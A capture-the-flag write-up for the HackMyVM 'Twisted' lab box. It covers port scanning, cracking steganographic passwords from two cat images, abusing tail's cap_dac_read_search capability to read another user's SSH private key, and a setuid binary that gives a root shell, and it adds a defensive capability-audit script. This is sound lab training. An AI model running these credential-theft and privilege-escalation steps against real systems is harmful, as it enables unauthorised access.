
HMV-Twisted

HMV-Twisted box writeup

Port scan

┌──(root㉿kakeru)-[~/tmp]
└─# nmap -A 192.168.240.249
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-31 19:26 CST
Nmap scan report for 192.168.240.249
Host is up (0.0018s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
2222/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 67:63:a0:c9:8b:7a:f3:42:ac:49:ab:a6:a7:3f:fc:ee (RSA)
| 256 8c:ce:87:47:f8:b8:1a:1a:78:e5:b7:ce:74:d7:f5:db (ECDSA)
|_ 256 92:94:66:0b:92:d3:cf:7e:ff:e8:bf:3c:7b:41:b7:5a (ED25519)
MAC Address: 76:50:9A:7A:10:0F (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 1.77 ms 192.168.240.249

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds

Only web and SSH are open.
So let's visit the web service and see what information it has.

Web reconnaissance

Content of the web page:

┌──(root㉿kakeru)-[~/tmp]
└─# curl 192.168.240.249
<h1>I love cats!</h1>
<img src="cat-original.jpg" alt="Cat original" width="400" height="400">
<br>

<h1>But I prefer this one because seems different</h1>

<img src="cat-hidden.jpg" alt="Cat Hidden" width="400" height="400">

We are given two images that look identical; the hint tells us to find the difference between the two photos.
First compare the two images with diff.

┌──(root㉿kakeru)-[~/tmp]
└─# diff cat-original.jpg cat-hidden.jpg
Binary files cat-original.jpg and cat-hidden.jpg differ

It reports that the two images differ as binary files. I tried binwalk to carve embedded files out, but that had no effect.
I looked at the walkthrough, which used the stegseek tool; noting it down to learn (Kali tools notes).

┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -wl /usr/share/wordlists/rockyou.txt cat-original.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "westlife"
[i] Original filename: "markus.txt".
[i] Extracting to "cat-original.jpg.out".


┌──(root㉿kakeru)-[~/tmp]
└─# stegseek -wl /usr/share/wordlists/rockyou.txt cat-hidden.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek

[i] Found passphrase: "sexymama"
[i] Original filename: "mateo.txt".
[i] Extracting to "cat-hidden.jpg.out".

The files were extracted successfully.

┌──(root㉿kakeru)-[~/tmp]
└─# ls
a.txt cat-hidden.jpg cat-hidden.jpg.out cat-original.jpg cat-original.jpg.out

┌──(root㉿kakeru)-[~/tmp]
└─# cat cat-hidden.jpg.out
thisismypassword

┌──(root㉿kakeru)-[~/tmp]
└─# cat cat-original.jpg.out
markuslovesbonita

We get a password, and from that password we can infer the username is markus; log in over SSH.

┌──(root㉿kakeru)-[~/tmp]
└─# ssh markus@192.168.240.249 -p 2222
The authenticity of host '[192.168.240.249]:2222 ([192.168.240.249]:2222)' can't be established.
ED25519 key fingerprint is SHA256:+Vy+50OqnmO0eOU2nhxE0uNjMjXrtpHTmrYtml4yF3s.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.240.249]:2222' (ED25519) to the list of known hosts.
markus@192.168.240.249's password:
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
markus@twisted:~$

Shell obtained.

Privilege escalation

This user has no sudo rights and there is no exploitable SUID binary.
There is a note.txt in this user's home directory.

markus@twisted:~$ cat note.txt 
Hi bonita,
I have saved your id_rsa here: /var/cache/apt/id_rsa
Nobody can find it.

The note hints at a user called bonita; use the id_rsa file to log in as that user.
Right now we have no permission to read that file,
but under /home we find two other users' directories.

markus@twisted:/home$ ls
bonita markus mateo
markus@twisted:/home$ cd bonita/
markus@twisted:/home/bonita$ ls
beroot user.txt

But we have no permissions on either of them, so we have to find a way to use id_rsa.
No ideas; I looked at the walkthrough, where the author used the getcap command to view file capabilities. Noting it down (Linux command notes).

markus@twisted:~$ getcap / -r 2>/dev/null
markus@twisted:~$ /usr/sbin/getcap / -r 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

We find that tail carries cap_dac_read_search, which bypasses file read and directory search permission checks, so we use tail to get the contents of id_rsa.
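As an added example (not part of the original writeup), here is a small Python audit that parses `getcap -r` output like the listing above and flags capability grants a defender should review. ping holding cap_net_raw is Debian's normal default and is allowlisted; tail holding cap_dac_read_search is the anomaly that made the private key readable. The sample input is constructed from the output shown on this page.

```python
import re

# Capabilities that bypass discretionary file permissions or grant
# root-equivalent power; an unexpected holder is a finding.
RISKY_CAPS = {
    "cap_dac_read_search",  # read any file, search any directory (the tail case above)
    "cap_dac_override", "cap_setuid", "cap_setgid", "cap_sys_admin",
    "cap_sys_ptrace", "cap_sys_module", "cap_chown", "cap_fowner",
}

# Binary/capability pairs that are the distribution's normal defaults.
EXPECTED = {("/usr/bin/ping", "cap_net_raw")}

# Accepts both libcap output styles:
#   "/usr/bin/tail = cap_dac_read_search+ep"   (libcap 2.25, as on Debian 10)
#   "/usr/bin/tail cap_dac_read_search=ep"     (newer libcap)
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap(output):
    """Return (path, set_of_caps, flags) for each parsable line of `getcap -r` output."""
    entries = []
    for line in output.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            entries.append((m.group("path"), set(m.group("caps").split(",")), m.group("flags")))
    return entries


def audit_capabilities(output):
    """Return sorted (path, cap) pairs that warrant review."""
    findings = []
    for path, caps, flags in parse_getcap(output):
        if "e" not in flags and "p" not in flags:
            continue  # inheritable-only: usable only by a caller that already holds the cap
        findings.extend((path, c) for c in caps if c in RISKY_CAPS and (path, c) not in EXPECTED)
    return sorted(findings)


# Constructed sample modelled on the getcap output shown in the writeup.
SAMPLE = """/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep
"""

if __name__ == "__main__":
    for path, cap in audit_capabilities(SAMPLE):
        print(f"REVIEW: {path} holds {cap}")
```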

markus@twisted:~$ tail -n 50 /var/cache/apt/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----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-----END OPENSSH PRIVATE KEY-----
┌──(root㉿kakeru)-[~/tmp]
└─# chmod 600 id_rsa

┌──(root㉿kakeru)-[~/tmp]
└─# ssh bonita@192.168.240.249 -p 2222 -i id_rsa

We get bonita's shell.
There is a program in the home directory.

bonita@twisted:~$ file beroot 
beroot: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=fecfbde059505a54f66d3229cc9ebb78f997a7ba, not stripped
bonita@twisted:~$ ./beroot
Enter the code:

Download it locally and inspect it in IDA.

We see that the code is 5880,
and with it we can get a root shell.

bonita@twisted:~$ ./beroot 
Enter the code:
5880
root@twisted:~# ls
beroot user.txt
root@twisted:~# cdd /root
bash: cdd: command not found
root@twisted:~# cd /root
root@twisted:/root# ls
root.txt
root@twisted:/root# cat root.txt
HMVwhereismycat

Done.

Summary: the hard parts were 1. how to get the password out of the two images, 2. how to obtain id_rsa from the first shell, and 3. how to use the beroot program.
New knowledge: the stegseek image steganography tool, /usr/bin/getcap for viewing file capabilities, and the Tab shortcut in IDA to view the pseudocode.